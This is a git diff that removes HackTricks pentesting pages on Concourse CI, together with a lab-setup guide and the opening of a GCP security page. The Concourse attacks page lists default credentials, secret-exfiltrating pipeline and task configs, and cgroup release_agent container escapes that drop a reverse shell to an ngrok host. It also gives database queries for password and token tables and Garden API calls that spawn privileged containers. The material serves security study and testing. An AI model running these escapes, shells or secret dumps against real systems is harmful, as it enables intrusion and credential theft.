-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
-
-* **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
-* **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
-
-
-
-Support HackTricks and get benefits!
-
-* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/concourse/concourse-enumeration-and-attacks.md b/cloud-security/concourse/concourse-enumeration-and-attacks.md
deleted file mode 100644
index 52d1baa21..000000000
--- a/cloud-security/concourse/concourse-enumeration-and-attacks.md
+++ /dev/null
@@ -1,466 +0,0 @@
-# Concourse Enumeration & Attacks
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## User Roles & Permissions
-
-Concourse comes with five roles:
-
-* _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-* **owner**: Team owners can **modify everything within the team**.
-* **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-* **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-* **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
-
-{% hint style="info" %}
-Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
-{% endhint %}
-
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
-
-## Vars & Credential Manager
-
-In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
-The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
-
-### Static Vars
-
-Static vars can be specified in **tasks steps**:
-
-```yaml
- - task: unit-1.13
- file: booklit/ci/unit.yml
- vars: {tag: 1.13}
-```
-
-Or using the following `fly` **arguments**:
-
-* `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
-* `-y` or `--yaml-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the var `NAME`.
-* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
-* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
-
-### Credential Management
-
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
-
-* [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
-* [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
-* [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
-* [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
-* [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
-* [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
-* [Caching credentials](https://concourse-ci.org/creds-caching.html)
-* [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
-* [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
-
-{% hint style="danger" %}
-Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
-{% endhint %}
-
-## Concourse Enumeration
-
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
-
-### Login and Current User enum
-
-* To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- * `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-* Get configured **targets**:
- * `fly targets`
-* Get if the configured **target connection** is still **valid**:
- * `fly -t status`
-* Get **role** of the user against the indicated target:
- * `fly -t userinfo`
-
-### Teams & Users
-
-* Get a list of the Teams
- * `fly -t teams`
-* Get roles inside team
- * `fly -t get-team -n `
-* Get a list of users
- * `fly -t active-users`
-
-### Pipelines
-
-* **List** pipelines:
- * `fly -t pipelines -a`
-* **Get** pipeline yaml (**sensitive information** might be found in the definition):
- * `fly -t get-pipeline -p `
-* Get all pipeline **config declared vars**
- * `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-* Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
-
-```bash
-rm /tmp/secrets.txt;
-for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
- echo $pipename;
- fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
- echo "";
-done
-echo ""
-echo "ALL SECRETS"
-cat /tmp/secrets.txt | sort | uniq
-rm /tmp/secrets.txt
-```
-
-### Containers & Workers
-
-* List **workers**:
- * `fly -t workers`
-* List **containers**:
- * `fly -t containers`
-* List **builds** (to see what is running):
- * `fly -t builds`
-
-## Concourse Attacks
-
-### Credentials Brute-Force
-
-* admin:admin
-* test:test
-
-### Secrets and params enumeration
-
-In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
-
-### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using:
-
-```bash
-fly -t tutorial intercept --job pipeline-name/job-name
-fly -t tutorial intercept # To be presented a prompt with all the options
-```
-
-With these permissions you might be able to:
-
-* **Steal the secrets** inside the **container**
-* Try to **escape** to the node
-* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
-
-```yaml
-jobs:
-- name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- echo "$SUPER_SECRET"
- sleep 1000
- params:
- SUPER_SECRET: ((super.secret))
-```
-
-With the **modification/creation** of a new pipeline you will be able to:
-
-* **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-* **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-* Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-* **Delete** created pipeline
-
-### Execute Custom Task
-
-This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
-
-```yaml
-# For more task_config options check https://concourse-ci.org/tasks.html
-platform: linux
-image_resource:
- type: registry-image
- source:
- repository: ubuntu
-run:
- path: sh
- args:
- - -cx
- - |
- env
- sleep 1000
-params:
- SUPER_SECRET: ((super.secret))
-```
-
-```bash
-fly -t tutorial execute --privileged --config task_config.yml
-```
-
-### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release\_agent to escape with some small modifications:
-
-```bash
-# Mounts the RDMA cgroup controller and create a child cgroup
-# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
-# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it
-mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
-
-# Enables cgroup notifications on release of the "x" cgroup
-echo 1 > /tmp/cgrp/x/notify_on_release
-
-
-# CHANGE ME
-# The host path will look like the following, but you need to change it:
-host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"
-
-# The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
-#/dev/vda1 on /scratch type ext4 (rw,relatime)
-#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
-#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
-#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)
-
-# Then next part I think is constant "hostpath-provisioner/default/"
-
-# For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
-# "concourse-work-dir" is constant
-# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)
-# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)
-
-# The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
-# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
-# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
-# the UID is the part we are looking for
-
-# Then the host_path is:
-#host_path="/mnt//hostpath-provisioner/default/concourse-work-dir--worker-/overlays//rootfs"
-
-# Sets release_agent to /path/payload
-echo "$host_path/cmd" > /tmp/cgrp/release_agent
-
-
-#====================================
-#Reverse shell
-echo '#!/bin/bash' > /cmd
-echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
-chmod a+x /cmd
-#====================================
-# Get output
-echo '#!/bin/sh' > /cmd
-echo "ps aux > $host_path/output" >> /cmd
-chmod a+x /cmd
-#====================================
-
-# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
-# Reads the output
-cat /output
-```
-
-{% hint style="warning" %}
-As you might have noticed this is just a [**regular release\_agent escape**](../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged) just modifying the path of the cmd in the node
-{% endhint %}
-
-### Escaping to the node from a Worker container
-
-A regular release\_agent escape with a minor modification is enough for this:
-
-```bash
-mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
-
-# Enables cgroup notifications on release of the "x" cgroup
-echo 1 > /tmp/cgrp/x/notify_on_release
-host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1`
-echo "$host_path/cmd" > /tmp/cgrp/release_agent
-
-#====================================
-#Reverse shell
-echo '#!/bin/bash' > /cmd
-echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
-chmod a+x /cmd
-#====================================
-# Get output
-echo '#!/bin/sh' > /cmd
-echo "ps aux > $host_path/output" >> /cmd
-chmod a+x /cmd
-#====================================
-
-# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-
-# Reads the output
-cat /output
-```
-
-### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
-
-```bash
-cat /concourse-auth/local-users
-test:test
-
-env | grep -i local_user
-CONCOURSE_MAIN_TEAM_LOCAL_USER=test
-CONCOURSE_ADD_LOCAL_USER=test:test
-```
-
-You cloud use that credentials to **login against the web server** and **create a privileged container and escape to the node**.
-
-In the environment you can also find information to **access the postgresql** instance that concourse uses (address, **username**, **password** and database among other info):
-
-```bash
-env | grep -i postg
-CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
-CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
-CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
-CONCOURSE_POSTGRES_USER=concourse
-CONCOURSE_POSTGRES_DATABASE=concourse
-CONCOURSE_POSTGRES_PASSWORD=concourse
-[...]
-
-# Access the postgresql db
-psql -h 10.107.191.238 -U concourse -d concourse
-select * from password; #Find hashed passwords
-select * from access_tokens;
-select * from auth_code;
-select * from client;
-select * from refresh_token;
-select * from teams; #Change the permissions of the users in the teams
-select * from users;
-```
-
-### Abusing Garden Service - Not a real Attack
-
-{% hint style="warning" %}
-This are just some interesting notes about the service, but because it's only listening on localhost, this notes won't present any impact we haven't already exploited before
-{% endhint %}
-
-By default each concourse worker will be running a [**Garden**](https://github.com/cloudfoundry/garden) service in port 7777. This service is used by the Web master to indicate the worker **what he needs to execute** (download the image and run each task). This sound pretty good for an attacker, but there are some nice protections:
-
-* It's just **exposed locally** (127..0.0.1) and I think when the worker authenticates agains the Web with the special SSH service, a tunnel is created so the web server can **talk to each Garden service** inside each worker.
-* The web server is **monitoring the running containers every few seconds**, and **unexpected** containers are **deleted**. So if you want to **run a custom container** you need to **tamper** with the **communication** between the web server and the garden service.
-
-Concourse workers run with high container privileges:
-
-```
-Container Runtime: docker
-Has Namespaces:
- pid: true
- user: false
-AppArmor Profile: kernel
-Capabilities:
- BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
-Seccomp: disabled
-```
-
-However, techniques like **mounting** the /dev device of the node or release\_agent **won't work** (as the real device with the filesystem of the node isn't accesible, only a virtual one). We cannot access processes of the node, so escaping from the node without kernel exploits get complicated.
-
-{% hint style="info" %}
-In the previous section we saw how to escape from a privileged container, so if we can **execute** commands in a **privileged container** created by the **current** **worker**, we could **escape to the node**.
-{% endhint %}
-
-Note that playing with concourse I noted that when a new container is spawned to run something, the container processes are accessible from the worker container, so it's like a container creating a new container inside of it.
-
-#### Getting inside a running privileged container
-
-```bash
-# Get current container
-curl 127.0.0.1:7777/containers
-{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
-
-# Get container info
-curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
-curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties
-
-# Execute a new process inside a container
-# In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
-wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
-
-# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
-nsenter --target 76011 --mount --uts --ipc --net --pid -- sh
-```
-
-#### Creating a new privileged container
-
-You can very easily create a new container (just run a random UID) and execute something on it:
-
-```bash
-curl -X POST http://127.0.0.1:7777/containers \
- -H 'Content-Type: application/json' \
- -d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'
-
-# Wget will be stucked there as long as the process is being executed
-wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
- --header='Content-Type:application/json' \
- 'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'
-```
-
-However, the web server is checking every few seconds the containers that are running, and if an unexpected one is discovered, it will be deleted. As the communication is occurring in HTTP, you could tamper the communication to avoid the deletion of unexpected containers:
-
-```
-GET /containers HTTP/1.1.
-Host: 127.0.0.1:7777.
-User-Agent: Go-http-client/1.1.
-Accept-Encoding: gzip.
-.
-
-T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157
-HTTP/1.1 200 OK.
-Content-Type: application/json.
-Date: Thu, 17 Mar 2022 22:42:55 GMT.
-Content-Length: 131.
-.
-{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}
-
-T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159
-DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1.
-Host: 127.0.0.1:7777.
-User-Agent: Go-http-client/1.1.
-Accept-Encoding: gzip.
-```
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md
deleted file mode 100644
index 457d4850a..000000000
--- a/cloud-security/concourse/concourse-lab-creation.md
+++ /dev/null
@@ -1,183 +0,0 @@
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
-# Testing Environment
-
-## Running Concourse
-
-### With Docker-Compose
-
-This docker-compose file simplifies the installation to do some tests with concourse:
-
-```bash
-wget https://raw.githubusercontent.com/starkandwayne/concourse-tutorial/master/docker-compose.yml
-docker-compose up -d
-```
-
-You can download the command line `fly` for your OS from the web in `127.0.0.1:8080`
-
-### With Kubernetes (Recommended)
-
-You can easily deploy concourse in **Kubernetes** (in **minikube** for example) using the helm-chart: [**concourse-chart**](https://github.com/concourse/concourse-chart).
-
-```bash
-brew install helm
-helm repo add concourse https://concourse-charts.storage.googleapis.com/
-helm install concourse-release concourse/concourse
-# concourse-release will be the prefix name for the concourse elements in k8s
-# After the installation you will find the indications to connect to it in the console
-
-# If you need to delete it
-helm delete concourse-release
-```
-
-After generating the concourse env, you could generate a secret and give a access to the SA running in concourse web to access K8s secrets:
-
-```yaml
-echo 'apiVersion: rbac.authorization.k8s.io/v1
-kind: ClusterRole
-metadata:
- name: read-secrets
-rules:
-- apiGroups: [""]
- resources: ["secrets"]
- verbs: ["get"]
-
----
-
-apiVersion: rbac.authorization.k8s.io/v1
-kind: RoleBinding
-metadata:
- name: read-secrets-concourse
-roleRef:
- apiGroup: rbac.authorization.k8s.io
- kind: ClusterRole
- name: read-secrets
-subjects:
-- kind: ServiceAccount
- name: concourse-release-web
- namespace: default
-
----
-
-apiVersion: v1
-kind: Secret
-metadata:
- name: super
- namespace: concourse-release-main
-type: Opaque
-data:
- secret: MWYyZDFlMmU2N2Rm
-
-' | kubectl apply -f -
-```
-
-## Create Pipeline
-
-A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which contains an ordered list of [Steps](https://concourse-ci.org/steps.html).
-
-## Steps
-
-Several different type of steps can be used:
-
-* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)
-* the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html)
-* the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html)
-* the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html)
-* the [`load_var` step](https://concourse-ci.org/load-var-step.html) loads a value into a [local var](https://concourse-ci.org/vars.html#local-vars)
-* the [`in_parallel` step](https://concourse-ci.org/in-parallel-step.html) runs steps in parallel
-* the [`do` step](https://concourse-ci.org/do-step.html) runs steps in sequence
-* the [`across` step modifier](https://concourse-ci.org/across-step.html#schema.across) runs a step multiple times; once for each combination of variable values
-* the [`try` step](https://concourse-ci.org/try-step.html) attempts to run a step and succeeds even if the step fails
-
-Each [step](https://concourse-ci.org/steps.html) in a [job plan](https://concourse-ci.org/jobs.html#schema.job.plan) runs in its **own container**. You can run anything you want inside the container _(i.e. run my tests, run this bash script, build this image, etc.)_. So if you have a job with five steps Concourse will create five containers, one for each step.
-
-Therefore, it's possible to indicate the type of container each step needs to be run in.
-
-## Simple Pipeline Example
-
-```yaml
-jobs:
-- name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- sleep 1000
- echo "$SUPER_SECRET"
- params:
- SUPER_SECRET: ((super.secret))
-```
-
-```bash
-fly -t tutorial set-pipeline -p pipe-name -c hello-world.yml
-# pipelines are paused when first created
-fly -t tutorial unpause-pipeline -p pipe-name
-# trigger the job and watch it run to completion
-fly -t tutorial trigger-job --job pipe-name/simple --watch
-# From another console
-fly -t tutorial intercept --job pipe-name/simple
-```
-
-Check **127.0.0.1:8080** to see the pipeline flow.
-
-## Bash script with output/input pipeline
-
-It's possible to **save the results of one task in a file** and indicate that it's an output and then indicate the input of the next task as the output of the previous task. What concourse does is to **mount the directory of the previous task in the new task where you can access the files created by the previous task**.
-
-## Triggers
-
-You don't need to trigger the jobs manually every-time you need to run them, you can also program them to be run every-time:
-
-* Some time passes: [Time resource](https://github.com/concourse/time-resource/)
-* On new commits to the main branch: [Git resource](https://github.com/concourse/git-resource)
-* New PR's: [Github-PR resource](https://github.com/telia-oss/github-pr-resource)
-* Fetch or push the latest image of your app: [Registry-image resource](https://github.com/concourse/registry-image-resource/)
-
-Check a YAML pipeline example that triggers on new commits to master in [https://concourse-ci.org/tutorial-resources.html](https://concourse-ci.org/tutorial-resources.html)
-
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-
diff --git a/cloud-security/gcp-security/README.md b/cloud-security/gcp-security/README.md
deleted file mode 100644
index c93ac8df7..000000000
--- a/cloud-security/gcp-security/README.md
+++ /dev/null
@@ -1,540 +0,0 @@
-# GCP Security
-
-
-
-Support HackTricks and get benefits!
-
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**π¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**π¦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-
-
-
-## Security concepts
-
-### **Resource hierarchy**
-
-Google Cloud uses a [Resource hierarchy](https://cloud.google.com/resource-manager/docs/cloud-platform-resource-hierarchy) that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
-
-At a high level, it looks like this:
-
-```
-Organization
---> Folders
- --> Projects
- --> Resources
-```
-
-A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
-
-### **IAM Roles**
-
-There are **three types** of roles in IAM:
-
-* **Basic/Primitive roles**, which include the **Owner**, **Editor**, and **Viewer** roles that existed prior to the introduction of IAM.
-* **Predefined roles**, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can **see all of them with the privileges they have** [**here**](https://cloud.google.com/iam/docs/understanding-roles#predefined\_roles).
-* **Custom roles**, which provide granular access according to a user-specified list of permissions.
-
-There are thousands of permissions in GCP. In order to check if a role has a permissions you can [**search the permission here**](https://cloud.google.com/iam/docs/permissions-reference) and see which roles have it.
-
-**You can also** [**search here predefined roles**](https://cloud.google.com/iam/docs/understanding-roles#product\_specific\_documentation) **offered by each product.**
-
